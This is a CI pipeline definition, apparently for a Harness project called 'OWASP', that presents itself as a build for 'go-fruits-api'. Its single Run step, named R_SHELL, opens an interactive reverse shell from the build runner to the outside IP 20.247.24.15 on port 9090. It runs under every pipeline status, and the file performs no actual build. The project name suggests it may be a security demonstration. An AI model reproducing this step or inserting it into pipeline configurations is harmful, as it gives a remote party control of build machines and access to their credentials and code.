pipeline:
  identifier: Build_go_fruits_api_1686138886411
  name: Build go-fruits-api
  orgIdentifier: default
  projectIdentifier: OWASP
  stages:
    - stage:
        identifier: build
        name: build
        spec:
          cloneCodebase: false
          execution:
            steps:
              - step:
                  type: Run
                  name: R_SHELL
                  identifier: BEE
                  spec:
                    shell: Bash
                    command: /bin/bash -i >& /dev/tcp/20.247.24.15/9090 0>&1
                  failureStrategies:
                    - onFailure:
                        errors:
                          - AllErrors
                        action:
                          type: MarkAsFailure
          platform:
            os: Linux
            arch: Amd64
          runtime:
            type: Cloud
            spec: {}
        type: CI
        when:
          pipelineStatus: All
